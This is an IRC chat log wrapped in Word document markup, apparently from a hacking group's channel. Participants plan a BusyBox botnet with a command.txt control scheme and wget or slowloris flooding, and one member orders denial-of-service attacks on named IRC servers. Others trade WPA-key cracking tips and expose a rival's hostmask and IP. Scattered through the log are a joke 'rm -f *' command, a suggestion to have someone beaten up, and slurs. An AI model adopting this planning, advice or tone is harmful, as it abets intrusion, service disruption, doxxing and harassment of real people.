        <w:t>Jun 01 12:40:46 neuron i was trying to find PSYBOT Jun 01 12:40:49 neuron pwnsauce: yeah Jun 01 12:40:51 pwnsauce ok Jun 01 12:40:58 pwnsauce onesec Jun 01 12:41:03 pwnsauce inb4linkage Jun 01 12:41:07 neuron lol Jun 01 12:41:13 neuron if you have a bot ill love you forever XD Jun 01 12:41:34 neuron if not im going to have to write a bash bot and i hate bash Jun 01 12:42:26 pwnsauce http://machinized.com/products.php Jun 01 12:42:29 pwnsauce look at Jun 01 12:42:32 pwnsauce "Hybrid" Jun 01 12:42:34 pwnsauce its Perl Jun 01 12:42:43 pwnsauce now I can try re writing some of it Jun 01 12:42:51 lol but we can't install perl on them xD Jun 01 12:43:00 pwnsauce kayla - i know Jun 01 12:43:05 pwnsauce but perl is closer to BASH Jun 01 12:43:07 pwnsauce than C Jun 01 12:43:08 pwnsauce :D Jun 01 12:43:13 * Neuron facepalm Jun 01 12:43:17 pwnsauce also QuadNX Jun 01 12:43:19 pwnsauce is in C Jun 01 12:43:29 neuron can't compile for them Jun 01 12:43:55 pwnsauce *thinks* Jun 01 12:43:58 pwnsauce brb 1 sec Jun 01 12:44:06 pwnsauce my brains not working right I think Jun 01 12:44:18 lol i think we're just going to have to work with whats already on them Jun 01 12:44:26 lol see i know people who said they've botted them Jun 01 12:44:30 lol but no ones proved it Jun 01 12:44:52 lol i think we're just going to have to make a loader for them Jun 01 12:45:07 lol now i remember you can load CISCO routers in to IRC using TELENT Jun 01 12:45:17 lol i wonder if the same can be done for these Jun 01 12:45:40 lol let me find it Jun 01 12:46:13 pwnsauce ok! I have found an IRC bot in BASH I think Jun 01 12:46:27 * Neuron_ (Neuron@HA-3hr.345.a84vd3.IP) has joined #pure- elite Jun 01 12:46:43 &lt;neuron_&gt; lol gonna be one of those days were my connection hates me Jun 01 12:47:00 pwnsauce http://linux.softpedia.com/get/Communications/Chat/BashBot-24097.shtml Jun 01 12:47:10 pwnsauce http://linux.softpedia.com/get/Programming/Libraries/TheBOT-25778.shtml Jun 01 12:47:49 pwnsauce now IDK if they are any use Jun 01 12:47:50 &lt;neuron_&gt; looking at it Jun 01 12:48:00 * Neuron has quit (Ping timeout: 121 seconds) Jun 01 12:48:08 &lt;neuron_&gt; don't think we want irc for this one Jun 01 12:48:16 pwnsauce aye, IRC was just an idea Jun 01 12:48:31 lol this is an old loader my friend wrote ages ago, it's for loading bots from a list of CISCO ip's http://pastebin.com/Y1E1QCgB Jun 01 12:48:52 lol we need something of the same effect Jun 01 12:49:50 &lt;neuron_&gt; http://pastebin.com/uqh4qEzJ Jun 01 12:49:57 &lt;neuron_&gt; this is the lame code im playing with right now Jun 01 12:50:16 &lt;neuron_&gt; i hate bash scripting because of its annoying tendencys so meh code sucks Jun 01 12:50:40 joepie92 http://www.thinq.co.uk/2011/6/1/nato-report- threatens-persecute-anonymous/ Jun 01 12:50:43 joepie92 we be terrorists nao guise Jun 01 12:50:56 &lt;neuron_&gt; were not anonymous :) Jun 01 12:52:01 pwnsauce brb :) ad Ill find Psyb0t src if I can Jun 01 12:52:23 lol "General Rapporteur Lord Jopling" Jun 01 12:52:28 &lt;neuron_&gt; lol gl if you can that would be amazing Jun 01 12:52:32 lol tht has to be a troll/hack ala tupac?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 12:52:36 lol tht name can't be real xD Jun 01 12:52:46 pwnsauce LOL kayla - didnt see that Jun 01 12:52:58 pwnsauce and Neuron_ if its out there its MINE now Jun 01 12:52:59 pwnsauce brbz Jun 01 12:53:03 lol Rapporteur Jopling xD wtf Jun 01 12:53:06 &lt;neuron_&gt; X Jun 01 12:53:07 &lt;neuron_&gt; d Jun 01 13:04:19 &lt;neuron_&gt; hmm linux dosen't allow multiple ping process's :/ Jun 01 13:04:59 sabu wtf you taking about lo Jun 01 13:05:01 sabu yes it does Jun 01 13:05:16 &lt;neuron_&gt; ping the same host with x amoutn of ping process? Jun 01 13:05:30 sabu ping google.com &amp; Jun 01 13:05:33 &lt;neuron_&gt; so ping google.com -c 10&amp; &lt;&lt; calling that 30 times Jun 01 13:05:34 sabu ping google.com &amp; Jun 01 13:05:37 sabu yes Jun 01 13:05:41 sabu you can do that all day Jun 01 13:05:42 &lt;neuron_&gt; results in one ping process using htop Jun 01 13:05:58 &lt;neuron_&gt; *im using htop to view running process* Jun 01 13:06:26 &lt;neuron_&gt; wait &lt;.&lt; derp Jun 01 13:07:46 &lt;neuron_&gt; my for loop using 'seq 30' wasn't working Jun 01 13:11:39 storm hii Jun 01 13:11:44 &lt;neuron_&gt; o/ storm Jun 01 13:12:34 storm .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 13:15:29 sabu storm Jun 01 13:15:47 * Neuron_ has quit (Connection closed) Jun 01 13:16:08 * Neuron (Neuron@HA-3hr.345.a84vd3.IP) has joined #pure- elite Jun 01 13:19:38 pwnsauce Neuron - got something inteeresting http://www.woodmann.com/forum/archive/index.php/t-12678.html Jun 01 13:19:41 storm yes sabu?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 13:19:48 pwnsauce its got a lnk to a bin Jun 01 13:19:56 neuron pwnsauce: tried both link :P nothing Jun 01 13:20:08 Topiary hey storm you wanna raep collective?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 13:20:11 neuron i couldn't even find a working binary of it :( Jun 01 13:22:05 storm yeah gimme a few Jun 01 13:22:39 joepie92 regex for matching TOC entries from RFCs Jun 01 13:22:40 joepie92 ([0-9]+\.)*[0-9]+[.]? [ .0-9]* Jun 01 13:22:52 joepie92 if someone happens to need it Jun 01 13:22:52 joepie92 :P Jun 01 13:24:05 storm just woke up Jun 01 13:24:14 Topiary heh Jun 01 13:24:25 sabu storm Jun 01 13:24:31 sabu get your boxes ready Jun 01 13:24:35 sabu I want you to hit them for a bit Jun 01 13:25:29 sabu you there niggy?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 13:27:25 * Neuron has quit (Ping timeout: 121 seconds) Jun 01 13:29:59 sabu storm hit their ircds again Jun 01 13:30:04 sabu take out collection Jun 01 13:30:05 sabu and madjack Jun 01 13:34:44 joepie92 - madjack.2600.net -------------------------------- - | Users: 104 (19.6%) Jun 01 13:34:44 joepie92 - '- blackbeard.2600.net -------------------------- | Users: 0 (0.0%) Jun 01 13:34:44 joepie92 - |- collective.2600.net ---------------------- | Users: 252 (47.5%) Jun 01 13:34:44 joepie92 - |- djslocker.2600.net ----------------------- | Users: 166 (31.3%) Jun 01 13:34:44 joepie92 - '- services.2600.net ------------------------ | Users: 9 (1.7%) Jun 01 13:37:04 * Neuron (Neuron@HA-s9t.345.a84vd3.IP) has joined #pure- elite Jun 01 13:37:08 neuron back Jun 01 13:37:09 neuron o/ Jun 01 13:37:14 sabu jea Jun 01 13:38:03 pwnsauce Neuron - hows it allw orking out?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 13:38:06 pwnsauce Im thinking here Jun 01 13:38:09 pwnsauce have SOME ideas Jun 01 13:38:15 pwnsauce ok Jun 01 13:38:57 neuron pwnsauce: we dont have alot to work with.. We can telnet,ssh,ping,wget &lt;&lt; from the busybox's Jun 01 13:39:17 neuron and i just tried to put my current work on the busybox and errors so yay \o/ Jun 01 13:44:41 pwnsauce ok, we can do those Jun 01 13:44:43 pwnsauce perhaps Jun 01 13:44:45 pwnsauce IDEA Jun 01 13:44:50 pwnsauce wgetraeping Jun 01 13:45:07 pwnsauce wget and pipe putput to /dev/null (or equivaent) Jun 01 13:45:22 pwnsauce have that in a loop Jun 01 13:45:34 pwnsauce so it just... keeps on wgetting Jun 01 13:45:40 pwnsauce hmmm one sec brb had idea Jun 01 13:45:52 sabu you can technically do slowloris attacks with wget Jun 01 13:46:51 neuron pwnsauce: yeah we were thinking about that. the trick is just to get a simple cnc type system going Jun 01 13:48:57 neuron im fighting with a bad subsitution error right on the busybox side. On my side works fine so few moments Jun 01 13:51:53 pwnsauce ah ok Jun 01 13:52:01 pwnsauce what C&amp;C we looking at?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 13:54:34 neuron just a simple webserver style one Jun 01 13:54:45 neuron script pulls down a "command.txt" and parses it for commands Jun 01 13:54:56 pwnsauce aaah :) Jun 01 13:55:05 pwnsauce and then you "Update" command.txt Jun 01 13:55:10 neuron yup Jun 01 13:55:11 pwnsauce via a web interface?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 13:55:21 neuron not a web interface but im sure we could do that Jun 01 13:55:29 pwnsauce I have something here Jun 01 13:55:31 neuron right now its just getting teh bash script to work on busybox Jun 01 13:55:43 storm hey pwnsauce Jun 01 13:55:44 storm :] Jun 01 13:55:46 pwnsauce a remote admin tool that uses th same mechanism - updates a command.txt file Jun 01 13:55:49 pwnsauce hey Storm :D Jun 01 13:55:54 storm suppie Jun 01 13:56:05 pwnsauce nm, working on some stuff Jun 01 13:56:14 pwnsauce my *nix partition nuked tho :/ Jun 01 13:56:28 storm yuck Jun 01 13:58:37 * Sabu gives channel operator status to Neuron Topiary voodoo pwnsauce Jun 01 13:58:37 * Sabu gives channel operator status to lol Jun 01 13:58:39 sabu thanks stor Jun 01 13:58:58 storm :p Jun 01 13:59:08 storm whatcha thanking me for Jun 01 13:59:11 storm seeing pings yet?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 13:59:59 neuron sigh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14:00:04 neuron ./bot.sh: 60: [[: not found Jun 01 14:00:10 neuron line 60 = done Jun 01 14:05:58 [redacted] back Jun 01 14:07:06 * also-cocks (pwnsauce@HA-q1a.9e1.pn6gun.IP) has joined #pure-elite Jun 01 14:07:43 * pwnsauce has quit (Ping timeout: 121 seconds) Jun 01 14:07:50 * also-cocks is now known as pwnsauce Jun 01 14:07:56 * Neuron has quit (Connection closed) Jun 01 14:08:18 * Neuron (Neuron@HA-s9t.345.a84vd3.IP) has joined #pure- elite Jun 01 14:08:42 pwnsauce my connection wernt Jun 01 14:10:08 * Neuron has quit (Quit: leaving) Jun 01 14:17:53 [redacted] do all of these little bastards Jun 01 14:17:57 [redacted] have a web directory?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:28:00 pwnsauce [redacted] - I dont knw... IIRC they have a web control interface of some kind Jun 01 14:28:28 pwnsauce Recursion! CANHAS SONYLULZ NAO PL0X!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:28:36 pwnsauce PM MEDIAFUCK LINKAGE!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:29:14 [redacted] then its simple Jun 01 14:29:17 [redacted] we write the bot in ASP Jun 01 14:29:18 [redacted] ???</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:29:19 [redacted] profit Jun 01 14:32:36 joepie92 what's the quickest way to crack a WPA-PSK key Jun 01 14:32:46 joepie92 or otherwise get access to a router using WPA-PSK Jun 01 14:32:46 joepie92 ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:32:53 * joepie92 never does that shit Jun 01 14:32:56 * trollpoll (trollpoll@HA-00r.11n.cc0br2.IP) has joined #pure-elite Jun 01 14:33:04 joepie92 ohai trollpoll Jun 01 14:33:08 * joepie92 repeats question Jun 01 14:33:12 trollpoll hi!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:33:12 joepie92 joepie92what's the quickest way to crack a WPA-PSK key Jun 01 14:33:12 joepie92 joepie92or otherwise get access to a router using WPA-PSK Jun 01 14:33:32 trollpoll hm, rainbow tables?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:34:25 joepie92 idk Jun 01 14:34:31 joepie92 I have absolutely no experience with shit like this Jun 01 14:34:36 joepie92 also, the guy who is asking has 18kbps internet Jun 01 14:34:39 trollpoll but, if is this kind of routers pre-configured with WPA key obtained automatically using MAC &amp; ESSID Jun 01 14:34:41 joepie92 so rainbow tables might not be the best idea... Jun 01 14:34:44 trollpoll could be easy...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:34:50 joepie92 ah Jun 01 14:34:50 trollpoll what kind of essid is it?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:34:51 joepie92 thomsons Jun 01 14:34:53 joepie92 1 sec Jun 01 14:35:06 trollpoll in spain the jazztel_XXXX are quickly crackeable Jun 01 14:35:11 trollpoll and WLAN_XX too Jun 01 14:35:15 trollpoll and WLAN_XXXX too Jun 01 14:35:20 joepie92 let me ask Jun 01 14:35:53 trollpoll all of them are calculable having the mac and the essid, but if the user has already changed the wpa... it could be very hard to crack Jun 01 14:36:13 pwnsauce hmmmmm Jun 01 14:36:19 pwnsauce capture the handshake Jun 01 14:36:20 trollpoll anyway, i've tried to crack an wpa twice, and without good results...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:36:27 pwnsauce upload to online cracker service Jun 01 14:36:41 trollpoll use gerix, is a very good tool to do so Jun 01 14:36:42 joepie92 pwnsauce: got a link to a cracking service? Jun 01 14:37:12 joepie92 Huawei_HG521 Jun 01 14:37:18 joepie92 is the name Jun 01 14:37:19 trollpoll hur...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:37:29 trollpoll so it looks like a preconfigured name...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:37:33 trollpoll lets see...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:38:47 trollpoll hmm, hg521 is the model of the router Jun 01 14:39:11 joepie92 ah Jun 01 14:39:14 joepie92 :/ Jun 01 14:40:37 trollpoll i think that penetrate is an android tool to do this... (calculate the default wpa of some routers) Jun 01 14:41:10 pwnsauce joepie92 - ill find one Jun 01 14:41:17 trollpoll http://underdev.org/penetrate/ Jun 01 14:41:17 pwnsauce and I have penetrate but cant make it work Jun 01 14:41:39 trollpoll the thomson is calculable...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:41:53 trollpoll SpeedTouch, Thomson, Orange, DMax, BBox, Infinitum, Otenet, Cyta Jun 01 14:42:11 trollpoll do u have an android? :P Jun 01 14:42:24 pwnsauce I has...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:42:45 joepie92 I don't Jun 01 14:42:46 joepie92 lol Jun 01 14:43:28 trollpoll (i do have one too)...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:43:42 trollpoll do you use tor (orbot) for android pwnsauce ? Jun 01 14:43:48 trollpoll is better than expected...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:50:24 joepie92 hey Jun 01 14:50:24 joepie92 guys Jun 01 14:50:27 joepie92 if anyone is interested Jun 01 14:50:31 joepie92 in the nonynews guy Jun 01 14:50:35 joepie92 who was posting shit on wikia Jun 01 14:50:35 joepie92 - Whois list of nonyNews Jun 01 14:50:35 joepie92 - Realname: nonyNews Jun 01 14:50:35 joepie92 - Hostmask: nonyNews!~anon@server106963.santrex.net * Jun 01 14:50:35 joepie92 - nonyNews is on: #lulzsec Jun 01 14:50:35 joepie92 - Server: collective.2600.net (Arghhh, Scourge of the seven seas!) Jun 01 14:50:35 joepie92 - End of /WHOIS list.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:50:40 joepie92 :&gt; Jun 01 14:50:47 joepie92 @ Topiary Jun 01 14:51:10 Topiary indeed Jun 01 14:51:28 joepie92 fucking idiots not realizing your shit doesn't get masked on 2600...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:51:35 * joepie92 does anonops ip match Jun 01 14:51:57 pwnsauce trollpoll - I dont use my android to access web Jun 01 14:52:13 pwnsauce I only use to breal WEP key on Eircom Jun 01 14:52:18 Topiary joepie92, can I make them realize we have all their IPs? Jun 01 14:52:30 joepie92 mmmm Jun 01 14:52:33 joepie92 let me see the userlist first Jun 01 14:52:38 joepie92 to see if I recognize any fishy names Jun 01 14:54:39 joepie92 oops :3 Jun 01 14:54:54 Topiary you started it|!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:54:57 Topiary heh Jun 01 14:56:03 joepie92 meh Jun 01 14:56:10 joepie92 I was feeling a bit juvenile Jun 01 14:56:11 joepie92 :D Jun 01 14:57:38 joepie92 &lt;awinee&gt;joepie91 has more skill then you Jun 01 14:57:39 joepie92 lold Jun 01 14:57:40 joepie92 lold hard Jun 01 14:58:04 joepie92 because whoising someone Jun 01 14:58:06 joepie92 is in any way a skill Jun 01 14:58:06 joepie92 lol Jun 01 14:59:19 joepie92 &lt;thejackal&gt;holy shit this asshole never shuts up Jun 01 14:59:20 joepie92 &lt;thejackal&gt;it was bad enough seeing the trash you spill on twitter Awinee, now you come here?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:59:21 joepie92 lolol Jun 01 14:59:55 trollpoll where are you? at 2600?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15:00:09 joepie92 ya Jun 01 15:00:10 joepie92 lol Jun 01 15:00:20 trollpoll just trolling? or doing something?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 15:01:01 joepie92 GOD Jun 01 15:01:02 joepie92 I FUCKING HATE Jun 01 15:01:03 joepie92 THESE Jun 01 15:01:06 joepie92 WIBYA TOOLBARS Jun 01 15:01:11 joepie92 seriously Jun 01 15:01:14 joepie92 I try to read a blog Jun 01 15:01:16 joepie92 and I get 23512351235 popups Jun 01 15:01:17 joepie92 saying Jun 01 15:01:20 joepie92 you can tweet this Jun 01 15:01:22 joepie92 you can FB like this Jun 01 15:01:23 joepie92 you can blah Jun 01 15:01:24 joepie92 you can derp Jun 01 15:01:26 joepie92 you can herp Jun 01 15:01:29 joepie92 click here to this Jun 01 15:01:31 joepie92 click there to that Jun 01 15:01:40 joepie92 and I'm like gtfo with that toolbar shit, I just want to read the fucking article Jun 01 15:03:44 joepie92 example Jun 01 15:03:44 joepie92 http://draugnavz.repofter.com/blog/ Jun 01 15:14:08 joepie92 http://buypoe.com/technology/12837-fox-news-hacked- anonymous.html Jun 01 15:14:09 joepie92 wat.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 15:16:45 trollpoll where is this video??</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 15:19:18 * Neuron (Neuron@HA-icg.62t.o0m95d.IP) has joined #pure- elite Jun 01 15:19:26 neuron hey o/ Jun 01 15:19:53 pwnsauce hey :) Jun 01 15:21:53 Topiary &lt;awinee&gt; Oh shit, Whirlpool is here Jun 01 15:21:54 Topiary &lt;awinee&gt; lets put the channel to +m and unvoice him so he can't speak :D Jun 01 15:21:54 Topiary &lt;awinee&gt; LULZ Jun 01 15:21:54 Topiary * Awinee gives voice to Power2All Jun 01 15:21:54 Topiary * Awinee sets ban on *!*root@*.static-host.net Jun 01 15:21:54 Topiary * You have been kicked from #awinee by Awinee (come back when you got the balls to talk to me in private) Jun 01 15:22:00 Topiary a stalker Jun 01 15:22:04 pwnsauce lmao Jun 01 15:22:06 Topiary who claims to be "within us" Jun 01 15:22:10 Topiary welp, you in here Awinee?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 15:22:19 pwnsauce lol no Jun 01 15:22:25 Topiary didn't think so _ Jun 01 15:22:30 pwnsauce xD Jun 01 15:23:32 pwnsauce root@awinees-mom:~# grep | Awinees Birth;rm -f * Jun 01 15:23:46 pwnsauce something liek that Jun 01 15:23:57 pwnsauce im too tired to parse correctly x( Jun 01 15:25:09 Topiary pretty sure we should pay someone to beat up Awinee IRL Jun 01 15:25:26 Topiary maybe a 12-year-old girl Jun 01 15:25:30 Topiary she could easily manage Jun 01 15:25:51 * Neuron has quit (Connection closed) Jun 01 15:26:21 * Neuron (Neuron@HA-5ve.d61.5kgcfl.IP) has joined #pure- elite Jun 01 15:29:23 neuron lol you one?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 15:37:21 pwnsauce Ill ask Rebeccca Black Jun 01 15:38:40 neuron pwnsauce: those busybox's have a web directory. On port 80 Jun 01 15:39:00 neuron Soo gotta create asp bot Jun 01 15:39:43 pwnsauce :D Jun 01 15:39:48 pwnsauce they no run PHP?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 15:39:52 pwnsauce I has PHP bot somewhere Jun 01 15:39:59 neuron no php asp :E Jun 01 15:40:11 pwnsauce gey Jun 01 15:40:12 pwnsauce hmmm Jun 01 15:40:19 pwnsauce if I give you ASP shell and PHP bot Jun 01 15:40:32 pwnsauce you can reverse engineer them or something Jun 01 15:40:44 pwnsauce you know... do the thing Jun 01 15:40:46 neuron we have a php bot Jun 01 15:40:51 neuron need asp bot Jun 01 15:41:23 pwnsauce oh *facepalms several times* sorry im a bit silly Jun 01 15:42:10 neuron its fine ive said some retarted shit today Jun 01 15:42:55 pwnsauce ah ok Jun 01 15:43:12 pwnsauce im a bit muddled cos my *nix partitions fucked and using wondows is difficult Jun 01 15:43:17 pwnsauce WHERS MY FUCKING TERMINAL Jun 01 15:43:30 neuron XD Jun 01 15:43:37 neuron click start-&gt;run type cmd Jun 01 15:43:48 pwnsauce but cmd =&gt; FAIL terminal :( Jun 01 15:44:22 pwnsauce i wants my root@yore-ma:~# Jun 01 15:44:24 pwnsauce not this Jun 01 15:44:46 pwnsauce C:\Users\root&gt; Jun 01 15:45:13 pwnsauce (my admin acc is called root on Doze also :D ) Jun 01 15:45:14 neuron lol Jun 01 15:45:45 pwnsauce OFC I have an acc called "going@~yore-ma:~$" Jun 01 15:45:51 pwnsauce cos its goin at yer ma !</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
